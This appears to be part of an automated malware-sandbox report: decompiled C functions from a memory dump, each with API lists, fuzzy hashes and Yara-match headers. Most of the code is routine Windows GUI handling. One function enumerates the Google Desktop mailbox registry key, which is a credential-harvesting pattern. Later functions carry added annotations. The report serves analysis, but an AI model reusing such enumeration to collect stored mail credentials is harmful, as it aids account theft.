                                                                                                                                                                  					E0040649B(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                                                                                                                                  					L5:
                                                                                                                                                                  					return E00401558(_t27, _a4, _a8, _a12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t11 != 0x28 || E004062DB(_a12) == 0) {
                                                                                                                                                                  					goto L5;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					SetBkMode(_a8, 1);
                                                                                                                                                                  					SetBkColor(_a8, GetSysColor(5));
                                                                                                                                                                  					SetTextColor(_a8, 0xc00000);
                                                                                                                                                                  					return GetSysColorBrush(5);
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
                                                                                                                                                                    • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                                                                                                                                                                    • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040EEB2
                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 0040EEBA
                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0040EEC4
                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 0040EED2
                                                                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 0040EEDA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1869857563-0
                                                                                                                                                                  • Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                  • Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
                                                                                                                                                                  • Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040B21F(intOrPtr __ecx, short _a4, short _a8) {
                                                                                                                                                                  				char _v265;
                                                                                                                                                                  				char _v520;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				RECT* _v540;
                                                                                                                                                                  				char _v560;
                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                  				char _v568;
                                                                                                                                                                  				intOrPtr _v572;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				int _t54;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  				short _t85;
                                                                                                                                                                  				short _t86;
                                                                                                                                                                  				RECT* _t97;
                                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                                  
                                                                                                                                                                  				_t93 = __ecx;
                                                                                                                                                                  				_t97 = 0;
                                                                                                                                                                  				_t104 = __ecx;
                                                                                                                                                                  				_v564 = __ecx;
                                                                                                                                                                  				if(_a4 == 0 || _a4 == 1) {
                                                                                                                                                                  					_t85 = _a8;
                                                                                                                                                                  					if(_t85 == 0x9c42) {
                                                                                                                                                                  						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                                                                                                                                  					}
                                                                                                                                                                  					_t114 = _t85 - 0x9c49;
                                                                                                                                                                  					if(_t85 == 0x9c49) {
                                                                                                                                                                  						_t54 = E0040AFC4(_t93, _t97, _t104, _t114);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t115 = _t85 - 0x9c59;
                                                                                                                                                                  					if(_t85 == 0x9c59) {
                                                                                                                                                                  						_t54 = E0040AF8A(_t97, _t104, _t115);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t116 = _t85 - 0x9c56;
                                                                                                                                                                  					if(_t85 == 0x9c56) {
                                                                                                                                                                  						_t54 = E0040AECD(_t104, _t116);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_a8 == 0x9c58) {
                                                                                                                                                                  						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                                                                                                                                  						_t54 = E0040A3E9(0, _t93, _t104, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_a8 == 0x9c44) {
                                                                                                                                                                  						_t54 = E0040AEB7(_t104);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_a8 == 0x9c43) {
                                                                                                                                                                  						_v532 = 0x414570;
                                                                                                                                                                  						E004019DA(_t93,  &_v520, 0x4133fc);
                                                                                                                                                                  						E004019DA(_t93,  &_v265, 0x413438);
                                                                                                                                                                  						_t104 = _v564;
                                                                                                                                                                  						_push( *(_t104 + 0x108));
                                                                                                                                                                  						_push( &_v532);
                                                                                                                                                                  						_t77 = 0x70;
                                                                                                                                                                  						E004014EA(_t77);
                                                                                                                                                                  						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                                                                                                  						_t20 =  &_v540; // 0x414570
                                                                                                                                                                  						_t54 = E004013E7(_t20);
                                                                                                                                                                  						_t97 = 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t86 = _a8;
                                                                                                                                                                  					_t122 = _t86 - 0x9c41;
                                                                                                                                                                  					if(_t86 == 0x9c41) {
                                                                                                                                                                  						_t54 = E0040AE52(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040ADA4(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A3E9(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A175( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A3E9(0, _t93, _t104, 0);
								E0040A5A1(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x414028;
								E0040596A( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x414028;
								_t54 = E004013E7( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408DAB( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409DE2( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E004087BE(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}
                                                                                                                                                                  0x0040b340
                                                                                                                                                                  0x0040b340
                                                                                                                                                                  0x0040b342
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b342
                                                                                                                                                                  0x0040b483
                                                                                                                                                                  0x0040b483
                                                                                                                                                                  0x0040b489
                                                                                                                                                                  0x0040b489

                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040B258
                                                                                                                                                                  • SetFocus.USER32(?,?,?), ref: 0040B2FE
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                  • String ID: pEA
                                                                                                                                                                  • API String ID: 3502187192-660962052
                                                                                                                                                                  • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                  • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                                                                                                                                                                  • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                  • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E00405CF8(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				struct HDWP__* _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                                  				struct HDWP__* _t30;
                                                                                                                                                                  				RECT* _t58;
                                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                                  
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t66 = __ecx;
                                                                                                                                                                  				_v12 = __ecx;
                                                                                                                                                                  				if(_a4 != 5) {
                                                                                                                                                                  					if(_a4 != 0x24) {
                                                                                                                                                                  						if(_a4 == 0xf) {
                                                                                                                                                                  							E004016E5(__ecx + 0xc);
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t29 = _a12;
                                                                                                                                                                  						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                                                                                                                                  						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t30 = BeginDeferWindowPos(0xb);
                                                                                                                                                                  					_t58 = _t66 + 0xc;
                                                                                                                                                                  					_v8 = _t30;
                                                                                                                                                                  					E00401645(_t58, _t30, 0x3ed, 0, 0, 1);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3ee, 0, 0, 1);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f4, 0, 0, 1);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3ef, 0, 0, 1);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f0, 1, 0, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f1, 1, 0, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f5, 1, 0, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f2, 1, 0, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 0x3f3, 1, 1, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 1, 1, 1, 0);
                                                                                                                                                                  					E00401645(_t58, _v8, 2, 1, 1, 0);
                                                                                                                                                                  					EndDeferWindowPos(_v8);
                                                                                                                                                                  					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                                                                                                                                  					_t66 = _v12;
                                                                                                                                                                  				}
                                                                                                                                                                  				return E00401558(_t66, _a4, _a8, _a12);
                                                                                                                                                                  			}
                                                                                                                                                                  0x00405cfb
                                                                                                                                                                  0x00405cfc
                                                                                                                                                                  0x00405d03
                                                                                                                                                                  0x00405d05
                                                                                                                                                                  0x00405d08
                                                                                                                                                                  0x00405dfd
                                                                                                                                                                  0x00405e16
                                                                                                                                                                  0x00405e1b
                                                                                                                                                                  0x00405e1b
                                                                                                                                                                  0x00405dff
                                                                                                                                                                  0x00405dff
                                                                                                                                                                  0x00405e02
                                                                                                                                                                  0x00405e09
                                                                                                                                                                  0x00405e09
                                                                                                                                                                  0x00405d0e
                                                                                                                                                                  0x00405d11
                                                                                                                                                                  0x00405d19
                                                                                                                                                                  0x00405d27
                                                                                                                                                                  0x00405d2d
                                                                                                                                                                  0x00405d3f
                                                                                                                                                                  0x00405d51
                                                                                                                                                                  0x00405d63
                                                                                                                                                                  0x00405d75
                                                                                                                                                                  0x00405d87
                                                                                                                                                                  0x00405d99
                                                                                                                                                                  0x00405dab
                                                                                                                                                                  0x00405dbd
                                                                                                                                                                  0x00405dcb
                                                                                                                                                                  0x00405dda
                                                                                                                                                                  0x00405de2
                                                                                                                                                                  0x00405ded
                                                                                                                                                                  0x00405df3
                                                                                                                                                                  0x00405df6
                                                                                                                                                                  0x00405e33

                                                                                                                                                                  APIs
                                                                                                                                                                  • BeginDeferWindowPos.USER32(0000000B), ref: 00405D11
                                                                                                                                                                    • Part of subcall function 00401645: GetDlgItem.USER32 ref: 00401655
                                                                                                                                                                    • Part of subcall function 00401645: GetClientRect.USER32 ref: 00401667
                                                                                                                                                                    • Part of subcall function 00401645: DeferWindowPos.USER32 ref: 004016D1
                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 00405DE2
                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                                                                                  • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                  • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                                                                                                                                                                  • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                  • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00407306(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                  				void _v259;
                                                                                                                                                                  				char _v260;
                                                                                                                                                                  				char _v264;
                                                                                                                                                                  				void* _v268;
                                                                                                                                                                  				void* _v276;
                                                                                                                                                                  				long _t17;
                                                                                                                                                                  				void* _t21;
                                                                                                                                                                  				void* _t24;
                                                                                                                                                                  				void* _t29;
                                                                                                                                                                  				int _t32;
                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  
                                                                                                                                                                  				_t29 = __ecx;
	_t17 = E0040F1B0(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
	_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
	if(_t17 == 0) {
		_t32 = 0;
		_v260 = 0;
		memset( &_v259, 0, 0xff);
		_t40 = _t39 + 0xc;
		_t21 = E0040F276(_v268, 0,  &_v260);
		while(1) {
			_t41 = _t40 + 0xc;
			if(_t21 != 0) {
				break;
			}
			_t24 = E0040F1B0(_v268,  &_v260,  &_v264);
			_t40 = _t41 + 0xc;
			if(_t24 == 0) {
				E004071D6(_t29, _a4, _v264,  &_v260);
				RegCloseKey(_v276);
			}
			_t32 = _t32 + 1;
			_t21 = E0040F276(_v268, _t32,  &_v260);
		}
		_t17 = RegCloseKey(_v268);
	}
	return _t17;
}
Instruction addresses: 0x00407306, 0x00407323, 0x00407328, 0x0040732d, 0x00407334, 0x0040733c, 0x00407341, 0x00407346, 0x00407353, 0x004073a1, 0x004073a1, 0x004073a6, 0x00000000, 0x00000000, 0x0040736e, 0x00407373, 0x00407378, 0x00407386, 0x0040738f, 0x0040738f, 0x00407396, 0x0040739c, 0x0040739c, 0x004073ac, 0x004073ac, 0x004073b3

APIs
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00407341
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
• Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
• Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
• Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
• Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040AECD(void* __ebx, void* __eflags) {
	char _v265;
	char _v526;
	char _v787;
	void _v1048;
	void _v3648;
	intOrPtr _v3652;
	char _v3660;
	void* _t30;

	_t30 = __ebx;
	_v3660 = 0x414040;
	memset( &_v3648, 0, 0x10);
	_v1048 = 0;
	_v787 = 0;
	_v526 = 0;
	_v265 = 0;
	_v3652 = 0x6c;
	memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
	_t12 =  &_v3660; // 0x414040
	if(E00401540(_t12,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
		E0040AEB7(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
	}
	SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
	_t18 =  &_v3660; // 0x414040
	return E004013E7(_t18);
}
Instruction addresses: 0x0040aecd, 0x0040aee3, 0x0040aeed, 0x0040af01, 0x0040af08, 0x0040af0f, 0x0040af16, 0x0040af1d, 0x0040af38, 0x0040af3a, 0x0040af47, 0x0040af64, 0x0040af64, 0x0040af75, 0x0040af7b, 0x0040af89

APIs
• memset.MSVCRT ref: 0040AEED
• SetFocus.USER32(?,?), ref: 0040AF75
  • Part of subcall function 0040AEB7: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FocusMessagePostmemset
• String ID: @@A$l
• API String ID: 3436799508-3245464651
• Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
• Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
• Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
• Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004085AB(void** __esi, struct HWND__* _a4) {
	long _v12;
	signed int _v24;
	signed int _v28;
	short _v32;
	void* _v40;
	long _t17;
	short* _t23;
	int _t24;
	void** _t25;

	_t25 = __esi;
	_t24 = 0;
	if(_a4 != 0) {
		_t17 = memset( *__esi, 0, __esi[1] << 2);
		if(__esi[1] > 0) {
			do {
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_t23 =  *_t25 + _t24 * 4;
				_v40 = 0x22;
				_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
				if(_t17 != 0) {
					 *_t23 = _v32;
					_t17 = _v12;
					 *(_t23 + 2) = _t17;
				}
				_t24 = _t24 + 1;
			} while (_t24 < _t25[1]);
		}
	}
	return _t17;
}
Instruction addresses: 0x004085ab, 0x004085b3, 0x004085b8, 0x004085c4, 0x004085cf, 0x004085d1, 0x004085d3, 0x004085d7, 0x004085db, 0x004085eb, 0x004085f2, 0x004085fa, 0x00408600, 0x00408603, 0x00408607, 0x00408607, 0x0040860b, 0x0040860c, 0x004085d1, 0x004085cf, 0x00408614

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: MessageSendmemset
• String ID: "$\LA
• API String ID: 568519121-1791104459
• Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
• Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
• Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
• Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406647(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;        // OPENFILENAMEA on the stack; _v80.._v20 are its fields

				// Fill the OPENFILENAMEA structure; field names follow the documented layout
				_v76 = __eax;               // hwndOwner
				_v68 = _a4;                 // lpstrFilter
				_v64 = 0;                   // lpstrCustomFilter
				_v44 = 0;                   // lpstrFileTitle
				_v36 = 0;                   // lpstrInitialDir
				_v32 = _a8;                 // lpstrTitle
				_v80 = 0x4c;                // lStructSize = sizeof(OPENFILENAMEA)
				_v56 = 1;                   // nFilterIndex
				_v52 = __esi;               // lpstrFile: caller-supplied output buffer
				_v48 = 0x104;               // nMaxFile = MAX_PATH
				_v28 = 0x81804;             // Flags: OFN_EXPLORER | OFN_FILEMUSTEXIST | OFN_PATHMUSTEXIST | OFN_HIDEREADONLY
				_v20 = 0x41403c;            // lpstrDefExt, presumably the "ini" string listed under String ID below
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;               // dialog cancelled or failed
				} else {
					strcpy(__esi, _v52);    // lpstrFile is __esi itself, so this copies the chosen path onto its own buffer
					return 1;
				}
			}

Instruction addresses: 0x0040664d - 0x004066ae

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FileNameOpenstrcpy
• String ID: L$ini
• API String ID: 812585365-4234614086
• Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
• Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
• Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
• Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00401000(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				// Subcall 0040619B fills the LOGFONTA (memset, then strcpy of the face name);
				// the third argument 0xa is most likely the font size (compare the Arial/0xe call noted below)
				E0040619B( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;                   // cache the HFONT in the owning object
				// WM_SETFONT (0x30) to dialog control 0x3ec of the window handle stored at __esi+4
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x418388 != 0) {
					// global flag at 0x418388 set: apply the same font to control 0x3ee as well
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}

Instruction addresses: 0x00401013 - 0x0040105f

APIs
  • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
  • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
• CreateFontIndirectA.GDI32(?), ref: 0040101F
• SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
• SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
• String ID: MS Sans Serif
• API String ID: 4251605573-168460110
• Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
• Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
• Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
• Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E004062DB(struct HWND__* _a4) {
				// 256-byte class-name buffer; the raw decompilation split it into
				// _v260 (first byte) and a 'void _v259' (the remaining 0xff bytes)
				char _v260[0x100];
				int _t10;

				_v260[0] = 0;
				memset( &_v260[1], 0, 0xff);
				GetClassNameA(_a4, _v260, 0xff);
				// L00412072 in the raw decompilation; the APIs list below resolves it to _stricmp
				_t10 = _stricmp(_v260, "edit");
				// The original neg/sbb/inc sequence ("sbb eax, eax"; ~eax + 1) yields 1 when
				// _stricmp returned 0, i.e. when the window class is "edit" (case-insensitive)
				return _t10 == 0;
			}

Instruction addresses: 0x004062f4 - 0x0040632e

APIs
• memset.MSVCRT ref: 004062FB
• GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
• _stricmp.MSVCRT(00000000,edit), ref: 00406320
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ClassName_stricmpmemset
• String ID: edit
• API String ID: 3665161774-2167791130
• Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
• Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
• Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
• Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
Uniqueness

Uniqueness Score: -1.00%
